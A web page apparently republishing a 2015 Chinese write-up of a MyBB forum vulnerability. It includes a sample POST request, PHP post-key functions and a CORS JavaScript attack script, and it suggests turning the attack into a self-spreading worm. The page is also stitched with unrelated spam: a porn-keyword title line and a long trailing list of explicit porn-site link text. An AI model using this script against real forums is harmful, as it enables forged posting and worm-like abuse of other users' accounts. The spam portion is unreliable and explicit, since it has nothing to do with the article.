青青久在线视频-青青久热-青青久久网-青青久久精品国产免费看-青青久久精品-青青久久国产成人免费网站

299

知名論壇系統MyBB被爆0day漏洞

時間: 2015-08-31 10:26:28   點擊數: 38961   來源: 耐思智慧

MyBB是國際上非常優秀的免費論壇軟件,最大的特色是簡單但是功能卻出奇的強大。支持多國語言,可以分別設置前臺后臺的語言,每個用戶都可以設置自己使用何種語言訪問論壇包括自己的時區等,自定義功能強大到沒有做不到只有想不到。

漏洞影響多個版本

本次影響版本:1.6x & 1.8x
測試版本:1.8.3 (最新), 以及1.6.16 (1.6系列最新)

正是因為其強大影響力,我便開始肆意玩耍MyBB以及監控請求,在此期間我注意到一些極有可能導致漏洞出現的東西,這些都已經在多個站點上進行了測試。

測試過程

首先損壞MyBB很簡單。當你去發布一個新的帖子,在提交時它會請求一些東西,以下為來自Hackforums論壇post請求的示例:

POST http://www.hackforums.net/newreply.php?tid=4602700&processed=1 HTTP/1.1
Host: www.hackforums.net
User-Agent: Mozilla/5.0 (Windows NT 5.3; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.hackforums.net/newreply.php?tid=4602700
Cookie: *
Connection: keep-alive
Content-Type: multipart/form-data; boundary=------71842462512788
Content-Length: 1588
------71842462512788
Content-Disposition: form-data; name="my_post_key"
******
------71842462512788
Content-Disposition: form-data; name="message_new"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="message"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="submit"
Post Reply
------71842462512788
Content-Disposition: form-data; name="action"
do_newreply
------71842462512788
Content-Disposition: form-data; name="replyto"
------71842462512788
Content-Disposition: form-data; name="posthash"
******
------71842462512788
Content-Disposition: form-data; name="attachmentaid"
------71842462512788
Content-Disposition: form-data; name="attachmentact"
------71842462512788
Content-Disposition: form-data; name="subject"
*
------71842462512788
Content-Disposition: form-data; name="quoted_ids"
------71842462512788
Content-Disposition: form-data; name="tid"
4602700
------71842462512788--

對于MyBB這個系統我們已經了解它的一些字段了,其中第一個就是post key,如果沒有這個字段,我們就不能發送任何帖子。獲取這個key十分簡單,稍后我們會進行詳細解釋。現在我們需要獲取的是posthash,posthash僅僅只是一個MD5字符串,只需創建一個有效的MD5字符串就可以繞過它。我可以告訴你這是因為占位符的原因,但是深究其內在不是我們今天要討論的問題。

盯著message_new和message字段,MyBB會提交這兩個字段,然而它僅顯示message字段中的內容,而不會顯示message_new字段中的內容。所以你可以在之前的帖子message_new字段中寫入cocks,當然你無法從帖子中看出與之前有什么不同。

如何生成post key

post key會依賴以下函數:

function generate_post_check() {     global $mybb, $session;     if($mybb->user['uid'])     {         return md5($mybb->user['loginkey'].$mybb->user['salt'].$mybb->user['regdate']);     }     // Guests get a special string     else     {         return md5($session->useragent.$mybb->config['database']['username'].$mybb->settings['internal']['encryption_key']);     } }

接著驗證post key是否調用該函數:

function verify_post_check($code, $silent=false) {     global $lang;     if(generate_post_check() != $code)     {         if($silent == true)         {             return false;         }         else         {             if(defined("IN_ADMINCP"))             {                 return false;             }             else             {                 error($lang->invalid_post_code);             }         }     }     else     {         return true;     } }

然后我們會看到它在查找loginkey, salt, regdate信息。現在我們獲取這些信息是相當的容易(我不想過多解釋,這個確實太容易了)一旦獲得post key,只要其是可用的并且用戶還未更改密碼(目前大多數論壇用戶很少有經常修改密碼的習慣)。

好了,這就開始我們的攻擊。首先我們需要確定一個攻擊目標(我在本機上搭建了一個站點),接著我寫了一個CORS腳本,然后用戶通過瀏覽器點擊一個用來請求帖子內容的URL,URL在另一端獲取到請求后,進行處理但是不會進行消息提示。假設你構造了一個合法的請求,你將會看到網頁的變化。

如何使用

基于不同的需求,可以構造不同的請求。這可用于提交帖子,獲取論壇榮譽點等。如果你想把這個漏洞搞的像是蠕蟲病毒一般,只需每個訪問到帖子的人都在這個帖子下面繼續回復(這個需要把更多的精力放在獲取post key上),說實話這種可能非常高!

CORS代碼

注意:這只是來自appsec-labs的示例代碼,你需要進行一些修改以適合你的攻擊目標:

// I suggest adding jQuery to top of file // You will have to modify the code to make it more useable as I won't be modifying it for you. var url = 'http://forum.mytarget.com/'; $(document).ready(function() {      corsMyBBPost(); }); function corsMyBBPost() {     for(i=0; i<times; i++)     {         cors_send("post", url + "?proof_of_concept=1&req_num=" + i, "post=data", false);     } } function cors_send(method, url, data, credentials) {     var cors;     if (window.XDomainRequest)     {         cors = new XDomainRequest();         if (cors)         {             cors.onprogress = function() { CORSstatus("Process") };             cors.onload = function() { CORSresult(cors.responseText) };         }         else             CORSstatus("Browser does not support Cross Origin Request");     }     else if (window.XMLHttpRequest)     {         cors = new XMLHttpRequest();         cors.onreadystatechange = function() {             if (cors.readyState == 4)                 CORSresult(cors.getAllResponseHeaders(), cors.responseText);             else                 CORSstatus("Process");             }     }     else     {         CORSstatus("Browser does not support AJAX");     }     method = method.toUpperCase();     if (method == "POST" || method == "PUT")         cors.open(method, url, data);     else         cors.open(method, url);     if (credentials)         cors.withCredentials = "true";     cors.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");     cors.send(data);     CORSstatus("Cross Origin Resource Sharing - Start"); } function CORSstatus(msg) {      console.log(msg); } function CORSerror(msg) {      console.log("Oh shit..." + msg); }

不加任何修飾,這代碼十分簡潔。在此我不會描述如何盜取post key的方法,如果你自己有何領悟那是你自己的事情。

最后,希望大家能夠從中多學多一些東西。

上一篇:中小企業制作網站的技巧 下一篇:注冊微信公眾號選服務號還是訂閱號?

旗下網站:耐思智慧 - 淘域網 - 我的400電話 - 中文域名:耐思尼克.cn 耐思尼克.top

耐思智慧 © 版權所有 Copyright © 2000-2025 IISP.COM,Inc. All rights reserved

備案號碼: 粵ICP備09063828號  公安備案號: 公安備案 粵公網安備 44049002000123號  域名注冊服務機構許可:粵D3.1-20240003 CN域名代理自深圳萬維網

聲明:本網站中所使用到的其他各種版權內容,包括但不限于文章、圖片、視頻、音頻、字體等內容版權歸原作者所有,如權利所有人發現,請及時告知,以便我們刪除版權內容

本站程序界面、源代碼受相關法律保護, 未經授權, 嚴禁使用; 耐思智慧 © 為我公司注冊商標, 未經授權, 嚴禁使用

法律顧問:珠海知名律師 廣東篤行律師事務所 夏天風 律師

美国ZOOM动物| 成人性色生活片免费看爆迷你 | 中文字幕AV无码一区二区三区电| 精品国际久久久久999波多野| 亚洲AV无码成人精品区瑜伽裤| 国产精品污WWW一区二区三区 | 亚洲综合无码一区二区痴汉| 精品国产你懂的在线观看| 亚洲AV永久无码精品| 国产做无码视频在线观看浪潮| 先锋影音人妻啪啪VA资源网站| 国产乱妇乱子在线播视频播放网站| 婷婷久久综合九色综合| 国产成人综合久久久久久| 偷窥@MADSEXTUBE| 国产精品毛多多水多| 无码人妻丰满熟妇精品区| 国产激情久久久久影院| 无码人妻精品一区二区三区免费| 国产精品久久久久精品| 午夜理论片YY6080影院| 国产又粗又猛又黄又爽无遮挡| 亚洲AV无码成人片在线观看| 红杏亚洲影院一区二区三区| 亚洲精品无码激情AV| 久久国产精品免费一区| 一級黃色毛片免費看| 蜜臀成人片免费视频在线观看| 6080YYY午夜理论片中无码| 欧美黑人疯狂性受XXXXX喷水| JIZZJIZZ日本护士水好多| 日本ⅩXXX色视频在线观看| 大香伊蕉AⅤ在人线国产| 天堂在/线资源中文在线BT| 国产精品亚洲第一区焦香味| 亚洲AV日韩AV永久无码绿巨人| 精品国产一区二区三区麻豆| 亚洲中文无码MV| 免费看30分钟打扑克教程| BRAZZERSHD欧美大屁股| 日产无人区二线三线乱码| 国产AV剧情MD精品麻豆| 性色AⅤ一二三天美传媒| 皇叔撞着小公主的小说叫什么| 亚洲永久无码7777KKK| 毛耸耸熟妇性XXXX交潮喷| BGMBGMBGM老太太XX一| 色88久久久久高潮综合影院| 国产精品国产三级国产AV中文| 亚洲AV无码成人精品区一本二本 | 人妻少妇乱子伦无码视频专区| 顶级欧美熟妇XXXXX欧美精品| 无码毛片内射白浆视频| 激情内射亚洲一区二区三区爱妻 | 日本一卡二卡四卡无卡国产| 国产成人亚洲综合| 亚洲AV无码之国产精品| 巨大垂乳日本熟妇挤奶| ZOMBIE视频SUPREME| 少妇人妻偷人精品一区二区| 国产一区二区三区好的精华液| 亚洲中文字幕日产无码| 欧美老熟妇又粗又大| 观看国产色欲色欲色欲WWW| 亚洲AV无码国产精品色午夜| 久久亚洲美女精品国产精品 | 亚洲VA欧美VA国产VA综合| 老熟妇仑乱一区二区视頻| 把腿张开自慰给我看| 无码中文精品专区一区二区| 久久精品AⅤ无码中文字字幕蜜桃| 2022最新韩国理伦片在线观看| 日韩日韩日韩日韩日韩| 韩国办公室三级HD激情在线观看| 在床上拔萝卜又疼又叫什么病| 人人妻人人做人人爽| 国产午夜精品久久久久免费视| 伊人色综合一区二区三区| 任你躁久久精品6| 国产又色又刺激高潮视频| 中国少妇BBWBBW| 色爱无码AⅤ综合区| 禁止18点击进入在线观看尤物| 97精品国产97久久久久久免费| 双腿张开被9个男人调教| 久久99精品久久久久久久久久| CHINESE裸体男野外GAY| 无码专区—VA亚洲V专区VR| 久久婷婷成人综合色| 成人乱子视频在线播放| 亚洲AV综合久久九九| 欧美成人精品视频在线不卡| 国产精品久久自在自线| 正在播放国产剧情亂倫| 色噜噜狠狠色综合久色AⅤ网| 娇妻被别人玩弄至高潮| VPSWINDOWS另类乱| 亚洲 春色 另类 小说| 男人一边吃奶一边弄下边好爽| 国产精品成人VA在线观看| 曰韩亚洲AV人人夜夜澡人人爽| 少妇被黑人到高潮喷白浆| 久久久国产精品一区二区18禁 | 精品国偷自产在线视频| WWW免费视频在线观看播放| 亚洲AV无码一区东京热不卡| 欧美日韩精品人妻一区二区三区| 国产偷V国产偷V亚洲高清| 99精品国产99久久久久久97| 亚州熟妇无码AV线播放| 欧美日韩人妻精品一区在线| 国产在线无遮挡免费观看| JAPANESEⅩⅩⅩHD日本| 亚洲成AV人影片在线观看| 欧洲无人区天空码头IV在哪一本| 国语自产少妇精品视频| 八戒八戒看片在线WWW看| 亚洲精品乱码久久久久久自慰| 日本人妻丰满大屁股a v| 久久国产精品免费一区二区三区| 丰满的熟妇人妻中文字幕久久| 影音先锋亚洲无码资源网| 同性男男黄G片免费网站 | 天干夜天干天天爽自慰| 免费观看交性大片| 国产午夜片无码区在线观看爱情网| JAVAPARSERHD高潮| 亚洲精品无码久久久久苍井空 | 久久久久亚洲AV无码网站少妇| 国产成人亚洲精品另类动态图| 4444亚洲人成无码网在线观看| 亚洲AV成人午夜福利在线观看 | 亚洲国产精品成人精品无码区| 日本中文字幕一区二区高清在线| 久久亚洲AV成人无码软件| 国产精品毛片Av无码一区二区| CHINESE国产AVVIDE| 亚洲性无码一区二区三区| 同性男男黄网站在线观看国外| 欧美大屁股妞性潮喷ⅩXX| 交换人生俱乐部全文免费阅读| 房中之术御女之功秘术| 60老妇VIDEOXXX| 亚洲国产在一区二区三区| 四虎国产精品永久在线动漫| 欧美成人伊人久久综合网| 精品无码三级在线观看视频| 国产成人涩涩涩视频在线观看 | 欧美性XXXX极品少妇| 久久久WWW影院人成_免费| 国产精品久久一区二区三区| 爱情岛论坛自拍亚洲品质极速福利| 野花日本大全免费观看2019| 亚洲AV成人片无码网站网一区 | 亚洲阿V天堂无码2020| 少妇高清精品毛片在线视频 | 好男人在线观看无遮挡版| 高清一区二区三区免费视频| AV天堂影音先锋AV色资源网站| 亚洲综合色区在线观看| 亚洲AV无码秘 蜜桃牛牛| 四虎AV永久在线精品免费观看| 欧洲成人一区二区三区| 狂猛欧美激情性XXXX大豆行情| 好男人资源在线WWW免费 | 亚洲中文字幕无码一区| 亚洲AV人无码激艳猛片服务器 | 蜜桃久久精品成人无码AV| 精品无码中文字幕不卡| 国产女人喷潮视频免费| 国产AVXXXX无套内射| 啊灬啊灬啊灬快灬少妇软件| _97夜夜澡人人爽人人喊_欧美| 亚洲色欲一区二区三区在线观看| 亚洲AV日韩AV成人AV| 无码熟妇人妻AV影音先锋| 少妇高潮呻吟在线观看| 日本人妻和黑人又粗又长又黄| 欧美另类精品黑人巨大| 麻豆文化传媒精品一区观看| 久久久久波多野结衣高潮| 娇妻被朋友征服中文字幕| 国产亚洲日韩AV在线播放不卡| 国产成人精品无码一区二区| 大波妺AV网站影院| 超薄肉色丝袜一二三四区| YY111111少妇无码理论片| 99热精品国产三级在线| 18禁强伦姧人妻又大又| 中国亲子伦孑XXⅩ| 一本无码中文字幕在线观 | 色88久久久久高潮综合影院| 日本免费人成视频在线观看| 人妻AV无码专区| 琪琪网三级伦锂电影| 欧美人与性囗牲恔配视频| 欧美精品VIDEOSEX极品| 欧美丰满少妇内射XXXX免费| 欧美成人性生活视频| 欧美劲爆精品白浆视频网站|